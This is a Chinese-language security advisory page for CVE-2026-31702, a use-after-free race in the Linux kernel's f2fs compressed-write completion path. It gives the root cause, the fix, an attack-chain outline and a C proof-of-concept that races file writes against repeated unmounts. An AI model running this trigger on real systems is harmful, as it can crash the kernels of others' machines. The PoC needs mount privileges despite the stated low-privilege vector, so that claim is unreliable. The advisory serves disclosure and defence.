CVE-2026-31702 CVSS 7.8 高危

CVE-2026-31702 Linux Kernel f2fs释放后重利用漏洞

披露日期: 2026-05-01

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31702

漏洞类型

释放后重利用 (Use-after-free)

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核f2fs文件系统中存在释放后重利用漏洞。在并发卸载场景下，`f2fs_compress_write_end_io`函数中的计数器递减可能导致`sbi`结构体被提前释放，而后续代码仍访问该内存，导致系统崩溃或潜在权限提升。

技术细节

该漏洞源于Linux内核f2fs文件系统压缩写回完成路径中的竞态条件。在`f2fs_compress_write_end_io`函数执行时，调用`dec_page_count`可能会将`F2FS_WB_CP_DATA`计数器减至零，从而解除对`f2fs_put_super`中并发卸载CPU的阻塞。此时卸载路径会调用`f2fs_destroy_page_array_cache`销毁`sbi->page_array_slab`并释放`sbi`。然而，Bio完成回调仍在执行，当调用`page_array_free(sbi, ...)`时，会尝试解引用已被销毁的slab缓存调用`kmem_cache_free`，导致内核崩溃或潜在的权限提升。修复方法是将`dec_page_count`移至`page_array_free`之后，确保在计数器递减可能触发卸载之前，所有对`sbi`的访问均已完成。

攻击链分析

STEP 1

步骤1：初始访问

攻击者需要在本地系统拥有低权限账户，能够访问并操作f2fs文件系统。

STEP 2

步骤2：触发写入

攻击者触发针对f2fs文件系统的压缩数据写入操作，导致内核调用`f2fs_compress_write_end_io`。

STEP 3

步骤3：竞态条件

在Bio回调执行期间，攻击者利用竞态条件并发触发文件系统的卸载操作（unmount）。

STEP 4

步骤4：释放后重利用

卸载操作释放了`sbi`结构体，但Bio回调中的`page_array_free`函数仍尝试访问已释放的内存。

STEP 5

步骤5：影响

导致内核崩溃（DoS），或在特定条件下实现内核态代码执行，从而提升权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-31702 (Race Condition in f2fs)
 * This is a conceptual trigger.
 * Compile: gcc -o poc poc.c
 * Usage: ./poc /dev/sdX (where sdX is an f2fs formatted block device)
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <pthread.h>

#define MOUNT_POINT "/mnt/f2fs_test"
#define LOOP_COUNT 1000

void *unmount_thread(void *arg) {
    for (int i = 0; i < LOOP_COUNT; i++) {
        system("umount " MOUNT_POINT " 2>/dev/null");
        usleep(100);
    }
    return NULL;
}

void *write_thread(void *arg) {
    char buffer[4096];
    int fd;
    for (int i = 0; i < LOOP_COUNT; i++) {
        fd = open(MOUNT_POINT "/test_file", O_WRONLY | O_CREAT | O_TRUNC, 0644);
        if (fd > 0) {
            // Write data to trigger compression and writeback
            for(int j=0; j<1024; j++) write(fd, buffer, 4096);
            fsync(fd);
            close(fd);
        }
        usleep(50);
    }
    return NULL;
}

int main(int argc, char *argv[]) {
    pthread_t t1, t2;

    if (argc < 2) {
        printf("Usage: %s <device>\n", argv[0]);
        return 1;
    }

    system("mkdir -p " MOUNT_POINT);
    
    // Mount loop to trigger the race
    for(int i=0; i<10; i++) {
        if (mount(argv[1], MOUNT_POINT, "f2fs", 0, NULL) == 0) {
            printf("Mounted successfully. Starting race...\n");
            
            pthread_create(&t1, NULL, write_thread, NULL);
            pthread_create(&t2, NULL, unmount_thread, NULL);
            
            pthread_join(t1, NULL);
            pthread_join(t2, NULL);
            
            system("umount " MOUNT_POINT " 2>/dev/null");
        }
    }
    return 0;
}

影响范围

Linux Kernel < 6.8

Linux Kernel 6.6.x

Linux Kernel 6.7.x

防御指南

临时缓解措施

限制本地低权限用户对f2fs文件系统的访问与挂载操作，直到系统内核完成升级。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表